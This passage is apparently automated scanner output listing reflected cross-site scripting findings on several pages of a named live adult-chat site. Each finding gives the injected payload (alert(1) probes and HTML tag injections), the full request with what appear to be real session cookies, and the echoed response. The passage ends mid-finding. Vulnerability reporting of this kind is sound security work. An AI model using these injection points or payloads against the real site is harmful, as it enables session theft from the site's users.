4.524. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/lesbian-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95de2"><a>dfcf1a79259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:50 GMT Connection: close Content-Length: 119446 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1"> ...[SNIP]...
4.525. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/lesbian-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c06bb'-alert(1)-'229e135fe5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:07 GMT Connection: close Content-Length: 119630 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63 ...[SNIP]...
4.526. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/lesbian/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 799a4'-alert(1)-'5a8a05031a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:42 GMT Connection: close Content-Length: 33699 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
4.527. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/lesbian/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6d9"><a>bfa76ccfa1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:33 GMT Connection: close Content-Length: 33515 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1"> ...[SNIP]...
4.528. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/live-sex-video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6088"><a>d342b9399fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:03 GMT Connection: close Content-Length: 25443 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.529. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/live-sex-video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f783'-alert(1)-'ad3501b39a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:16 GMT Connection: close Content-Length: 25590 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
4.530. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/nude-chat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb7a'-alert(1)-'34ec5f17816 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:29 GMT Connection: close Content-Length: 23794 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
4.531. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/nude-chat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06eb"><a>2a1bdec8937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:23 GMT Connection: close Content-Length: 23647 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.532. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/orgies/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44239'-alert(1)-'0a5659e80e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
